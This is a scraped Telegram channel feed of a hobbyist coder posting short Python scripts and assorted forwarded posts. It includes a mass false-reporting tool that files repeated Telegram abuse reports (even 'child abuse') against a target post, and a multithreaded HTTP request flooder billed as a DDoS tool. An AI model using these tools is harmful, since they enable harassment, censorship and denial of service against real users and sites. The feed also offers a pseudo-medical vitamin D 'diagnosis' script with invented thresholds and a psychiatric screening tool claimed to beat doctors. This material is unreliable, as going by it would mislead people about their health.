The Ghost
18 subscribers
29 photos
8 files
4 links
Download Telegram
import random
from telebot import TeleBot, types

class WallpaperBot:
def init(self, token):
self.bot = TeleBot(token)
self.bot.message_handler(commands=["start"])(lambda m: self.bot.send_message(m.chat.id, "🎨 أرسل 'صورة' لتصلك خلفية عشوائية", reply_markup=types.ReplyKeyboardMarkup(resize_keyboard=True).add("صورة")))
self.bot.message_handler(func=lambda m: m.text=="صورة")(lambda m: self.bot.send_photo(m.chat.id, f"https://picsum.photos/1280/720?random={random.randint(1,99999)}", caption="🌟 خلفية عشوائية"))
self.bot.infinity_polling()

WallpaperBot("token hereeeee")

This code bot can make random photo just one press

You can operation the code on Any editor as python3 or kali or termux

Just 11 Line ❤️
The Ghost
Photo
If sameone shere my channel for two his friends will earns this project free 🌹

اذا شارك احدكم القناة ل اثنين من اصدقائه سوف يكسب هذا المشروع مجانا 🌹

Sent Screenshot here @lwlxbot
ارسل سكرين هنا @lwlxbot
Tool be uncovered The Cap-tcha Type 📦
اداة كشف نوع الكاب-تشا 📦

It will be downloaded now 🔥
سيتم تحميلها الان 🔥
The Ghost
Tool be uncovered The Cap-tcha Type 📦 اداة كشف نوع الكاب-تشا 📦 It will be downloaded now 🔥 سيتم تحميلها الان 🔥
Catypatcha.py
3.6 KB
Determine the type of captcha

Library Orders
pip install requests
pip install beautifulsoup4


Open in termux
python3 + path the file


The site creeps frighteningly 👌

Publication allowed @ss77u
2
﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽
Rare Telegram Emoji
ايموجيات تليجرام مميزة

ღ⁂•▲░√⇝★☆☻☼☽☾♔♕♖♗♞♝♜♛♚♘✘✎♡✧✦✩✪❂❁❀✿✹✯✮❅❆❦⛟𖥠𖥔𖡡𖣳⛃⛁𖠜✁✃▓𓁋𓁊𓁉𓁈𓁇𓁆𓀭𓀮𓀣𓀢𓀡〠㋡𓁻𓁼𓂀﷽𓊇𓊆𓊉𓊈༗𒀱𒅒𒋲𒂭𒌑𒀽𒁈𓃭𓃥✰⛤⛥⫸⫷◹◸◺◿
𓅠 𓅡 𓅢 𓅣 𓅤.
𓅥 𓅦 𓅧.
𓅨 𓅩 𓅪 𓅫.
𓅬 𓅭 𓅮 𓅯.
𓅰 𓅱 𓅲 𓅳 𓅴 𓅵 𓅶 𓅷.
𓅸 𓅹 𓅺 𓅻 𓅼 𓅽 𓅾.
𓅿 𓆀 𓆁 𓆂.
𓆃 𓆄 𓆅 𓆆 𓆇.
𓅙 𓅚 𓅛 𓅜 𓅝 𓅞 𓅟.
𓅐 𓅑 𓅒.
𓄾 𓄿 𓅀 𓅁 𓅂 𓅃 𓅄 𓅅.
𓅆 𓅇 𓅈 𓅉 𓅊 𓅋 𓅌 𓅍 𓅎 𓅏.
𓆑 𓆒 𓆓 𓆔 𓆕 𓆖 𓆗 𓆘 𓆙 𓆚.
𓅇 𓆗𓂀.
𓆝 𓆟 𓆞 𓆝 𓆟.
𓅡 𓅢 𓅣 𓅤 𓅥 𓅦 𓅧 𓅨 𓅩 𓅪 𓅫 𓅬 𓅭.
𓅮 𓅯 𓅰 𓅱 𓅲 𓅳 𓅴 𓅵 𓅶 𓅷 𓅸 𓅹 𓅺 𓅻 𓅼 𓅽 𓅾.
𓃥 𓃰 𓃯 𓃵.

You can put it instead of your account name as if you are a special activator

تكدر تحطها باسم حسابك وكانك مفعل مميز 🔥❤️

#منشور_منقول
from telethon.sync import TelegramClient as _A;from telethon.tl.types import InputReportReasonSpam as _B,InputReportReasonViolence as _C,InputReportReasonPornography as _D,InputReportReasonChildAbuse as _E,InputReportReasonCopyright as _F,InputReportReasonGeoIrrelevant as _G,InputReportReasonOther as _H;from telethon.tl.functions.messages import ReportRequest as _I,GetMessagesRequest as _GM;import re,time

print("="*40+"\n🔐 Enter your Telegram API credentials\n"+"="*40)
try:_1=int(input("🆔 API ID: ").strip());_2=input("🔑 API Hash: ").strip();_3=input("📱 Phone number (e.g. +964...): ").strip()
except:print(" Invalid input");exit()

_CLI=_A('X0',_1,_2).start(_3)

def _extract(x):m=re.search(r't\.me/(c/)?([^/]+)/(\d+)',x);return(f"-100{m.group(2)}"if m.group(1)else m.group(2),int(m.group(3)))if m else (_ for _ in ()).throw(ValueError("Invalid link format."))

def _R(x,y,z='spam'):
try:_T=_CLI.get_entity(x);_M={'spam':_B(),'violence':_C(),'porn':_D(),'child':_E(),'copyright':_F(),'geo':_G(),'other':_H()}.get(z,_B());return _CLI(_I(peer=_T,id=[y],reason=_M,message="Auto report"))
except Exception as e:return e

if name=='main':
print("="*40+"\n📡 TELEGRAM AUTO REPORT TOOL\n"+"="*40)
try:_X=input("🔗 Enter post URL (e.g. https://t.me/username/123): ").strip();target,msg_id=_extract(_X)
except:print(" Invalid Telegram link.");exit()
_Z=input("🚨 Reason (spam/violence/porn/child/copyright/geo/other): ").strip().lower();_Z=_Z if _Z in['spam','violence','porn','child','copyright','geo','other']else'spam'
try:delay=int(input(" Delay between reports (seconds, e.g. 10): ").strip())
except:delay=10
try:count=int(input("🔁 How many reports? (e.g. 5): ").strip())
except:count=1
print(f"\n🚀 Starting auto-reporting...\n🧾 Target: {target}, Message ID: {msg_id}, Reason: {_Z}\n")
[print(f" Report {i+1}/{count} sent."if _R(target,msg_id,_Z)else f" Report {i+1} failed.")or time.sleep(delay)for i in range(count)]
print("\n🎯 Done. All reports attempted.")


Code
d-el-ete Telegram posts
كود ت-طي-ر منشورات تليجرام

Code 100 lines but I shortened it to 26 just line 👌
كود 100 سطر ولكن انا اختصرته ب 26 سطر 👌

- @SS77U
import requests, concurrent.futures as cf
def ghost(url, req=100, tid=1):
for i in range(req):
try: s = requests.get(url, timeout=3).status_code
except: s = 'Fail'
print(f"\033[1;34m[T{tid}]\033[0m \033[1;32mR{i+1:03}\033[0m : \033[1;33m{s}\033[0m")
if name == "main":
u = input("\033[1;36m🌐 URL:\033[0m ").strip(); t, r = 10, 100
print(f"\n\033[1;35m🚀 Starting: {t}x{r} requests\033[0m\n")
with cf.ThreadPoolExecutor(t) as ex: [ex.submit(ghost, u, r, i+1) for i in range(t)]
-------

----------------
Ddo-s at-tack
To-ol Very simple
Just 10 Line
design nice 📦
-----------------------
For educational purposes only ❤️👌

- @SS77U
sugary-blood.py
3.5 KB
Tool Blood sugar analysis
اداة تحليل نسبة السكر في الدم
Mode of operation | طريقة التشغيل
1 - Sugar content / نسبة السكر
2 - Before or next of the food / قبل او بعد الاكل
She will give you useful medical advice and diagnosis of the condition
ستقدم لك نصائح طبية مفيدة وتشخيص الحالة

Soon I will add a graph of the future evolution of blood sugar 🌹
قريبا ساضيف رسوم بيانية لتطور المستقبلي للسكر في الدم 🌹

- @SS77U
import os, time; c = 0
def show(): os.system('cls' if os.name == 'nt' else 'clear'); print("""\n╔══════════════════════════════════╗\n║ 🌙 المسبحة الإلكترونية ║\n╠══════════════════════════════════╣\n║ ⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣶⣤⡀⠀⠀⠀⠀⠀⠀ ║\n║ ⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀ ║\n║ ⠀⠀⠀⠀⠀⠀⠈⠻⢿⣿⣿⠟⠁⠀⠀⠀⠀⠀ ║\n║ 🕋 سبح واذكر الله كثيرًا 🕋 ║\n╚══════════════════════════════════╝""")
def run():
global c
while 1:
show(); print(f"\n📿 عدد التسبيحات: {c}\nاضغط [Enter] للتسبيح، [R] لإعادة، [Q] للخروج")
x = input(">>> ").strip().lower()
if x == "": c += 1
elif x == "r": c = 0
elif x == "q": print("\n🕌 جزاك الله خيراً 🌟"); time.sleep(1.5); break
exec("run()")


Electronic rosary / مسبحة الكترونية
language >> python
Lines >> 11

Mode of operation
1 - Open pydroid3 Or any editor another
2 - Choose the file or paste the code and run

bless god for you / بارك الله فيك 🌹

- @SS77U
Coming soon bot English Language Development

Exams + Leaderboard + Words + Sentences + Sounds

The boots are under my supervision 🌹👌

- @SS77U
Breath-tool.py
3.4 KB
tool that detects if you are mentally ill or not
اداة تكشف اذا انت مريض نفسي او لا
Mode of operation
1 - Answers questions / تجيب عن الأسئلة
2 - Analyze the results(تحلل النتائج)
3 - She gives you the answer(تقدم لك الاجابة)

very accurate tool and better than any doctor And better than any ai
اداة قوية جدا افضل من اي طبيب وافضل من اي ذكاء اصطناعي اخر 👌
It can be linked to bots or psychological analysis sites
يمكن ربطها ببوتات او مواقع للتحليل حالة النفسية 🌹

- @SS77U
The Ghost
Breath-tool.py
I'll convert to bot and develop it to the best
ساقوم بتحويل إلى بوت واجعلها افضل 👌🌹
I'll make her give Integrated medical report Tips and treatment methods
ساجعلها تعطيك تقرير طبي متكامل ونصائح وطرق العلاج

- @SS77U
صيام يوم عاشوراء

صيام يوم = مغفرة ذنوب سنة كاملة

هل تعلم أنك إن صمت يوم السبت، فإن جميع الذنوب التي ارتكبتها في السنة الماضية سيغفرها الله لك ويصفح عنك؟

وإن ذكرت غيرك، فستحصل على الأجر نفسه بإذن الله.

﴿ وَذَكِّرْ فَإِنَّ الذِّكْرَى تَنْفَعُ الْمُؤْمِنِينَ ﴾
Arduino
#include <Wire.h>
#include "Adafruit_TCS34725.h"

Adafruit_TCS34725 sensorModule(TCS34725_INTEGRATIONTIME_50MS, TCS34725_GAIN_4X);

void setup() {
Serial.begin(9600);
if (!sensorModule.begin()) {
while (true);
}
}

void loop() {
uint16_t redValue, greenValue, blueValue, clearValue;
sensorModule.getRawData(&redValue, &greenValue, &blueValue, &clearValue);
Serial.print(redValue); Serial.print(",");
Serial.print(greenValue); Serial.print(",");
Serial.print(blueValue); Serial.print(",");
Serial.println(clearValue);
delay(1500);
}

Python
import serial
import time

def analyze_reading(red, green, blue):
if red < 50 and blue > 200:
return 8
elif red > 200 and green < 100:
return 35
return 22

def describe_level(value):
if value < 10:
return "Critical deficiency (<10 ng/mL)"
elif value < 20:
return "Severe deficiency (10–20 ng/mL)"
elif value < 30:
return "Moderate deficiency (20–30 ng/mL)"
elif value <= 50:
return "Normal range (30–50 ng/mL)"
elif value <= 100:
return "High but acceptable (50–100 ng/mL)"
else:
return "Dangerously high (>100 ng/mL)"

def read_from_device():
port = serial.Serial('COM3', 9600, timeout=2)
time.sleep(2)
line = port.readline().decode().strip()
red, green, blue, clear = map(int, line.split(','))
result = analyze_reading(red, green, blue)
description = describe_level(result)
print(f"\nRGB: {red}, {green}, {blue} → Vitamin D: {result} ng/mL")
print("Diagnosis:", description)

read_from_device()


سورس كود تكدر تربطه بجهاز طبي
وظيفته >> قياس نسبة فيتامين D في الدم
كود مبدئي بسيط

طريقة التشغيل :
1 - تشتري جهاز طبي ( سعره يتراوح 50-100$) او حتى اقل اذا مستخدم

2 - اربط الحساس TCS34725 مع شريحة Arduino وغير com3 حسب منفذ صحيح

3 - حط شريحة الدم وبعدها شغل بايثون
4 - رح يطبع لك النتيجة الطبية

الجهاز الي تشتري مو شرط طبي اي جهاز يقبل ربط Arduino سعره غالي ومتوفر بل عراق بشكل محدود فقط في مستشفيات

اذا عندك موقع محل او شركة تبيع هذا الجهاز راسلني 🌹

# By @SS77U
متوفر ملحقات مشروع ( تحويل كلامك إلى أغنية الي تعجبك )

تنطي رابط الأغنية
تدز بصمة صوتية لكلامك أو بصمة مثلا ( تغني شعر لو أغنية معينة )
رح يحول البصمة الصوتية إلى أغنية بنفس لحن الأغنية الي دزيت رابطها

فقط ملحقات المشروع مو كامل

أسلوب برمجي حديث ومرتب
يدوي بدون api

الي يريد الملحقات ويكمل المشروع يراسلني @lwlxbot
⚡️ محادثاتكم مع ChatGPT تتسرب إلى نتائج بحث Google — تم اكتشاف ثغرة أمنية خطيرة لم تُعالج بعد.


عندما تقومون بنسخ رابط المحادثة، حتى دون إرساله، يتم إضافته تلقائيًا إلى قاعدة بيانات Google.

الآن يمكن العثور على أي محادثة باستخدام استعلام البحث:
‏site:chatgpt.com/share «كلمة مفتاحية»

يتم الكشف حاليًا عن كمية كبيرة من المعلومات الخاصة والشخصية للجمهور. يمكن بذلك:
- تعزيز الشركات الناشئة بتكلفة منخفضة في نتائج SEO
- العثور على مفاتيح API خاصة، رموز وصول، وأنظمة إدارة تم مشاركتها بين الموظفين
- تسريب خطط عمل، أسرار أو قصص شخصية لمستخدمين آخرين

لإزالة نفسك من نتائج البحث، ادخل إلى إعدادات ChatGPT، انتقل إلى تبويب «الروابط العامة» وقم بإزالة الروابط

#منقول
استغفر الله العظيم واتوب اليه
-----------
مثل هاي تعاليق دائما تطلع بمنصة يوتيوب
ومانعرف يكتبون التعليق بنياتهم او مجرد من اجل كسب الاعجابات؟

شنو رايكم نسوي اداة
تكشف نية هذا الشخص هل كتب التعليق لأجل الاعجابات والاشتراكات ام من قلبه؟

لايعلم الغيب إلا الخالق العظيم
ولكن هي مجرد اداة تعمل بأوامر ( استراتيجية ) مثل التحقيق تجيب دلائل من تعليقات فيديوهات أخرى لنفس الحساب
وتكشف اذا تم تكرار التعليق من نفس الحساب المعلق ام لا
وتكون بنسبة 96% المصداقية!

اداة بسيطة ولكن برمجتها معقدة ربما اسويها اذا شفت تفاعلكم الجميل 🌹

- @SS77U
السلام عليكم اخوان جهات مختصه امنيه تگول الي يبيعون الگروبات بالتلي كل حساباتهم تحت المراقبه هالشي وراه تاجر كلش جبير هالتاجر صيني يشتغل بال دارك ويب يجيي منضومات ارهابيه للتلي وهالگروبات القديمة صحيح قديمه وقوية بس هم راح تتبند ويبحثون على الشخص الي باع هالگروب وكلشي تكون تحت المراقبه لذا هالشي نصيحة الكم هواي شباب رايدو گروبات ورادو يشترون واتفقت ويه شباب هم رادو يشترون مني الگروبات خاف ما تدرون وهذا التاجر مراح يستخدم كل الگروبات للتجارة المخدرات والاسلحة بس ..لا راح يستخدمها للامور الاباح/ية لذلك انتبهوا واي شخص باع گروب لشخص خلي يصور الاتفاق الي بيناتهم وبشگد باع الگروب والي ما جان يدري بهالشي خل يبطل يبيع ويشتري وبكيفكم بعد

#منقول
جميع اختصارات برنامج وورد
All Program Abbreviations word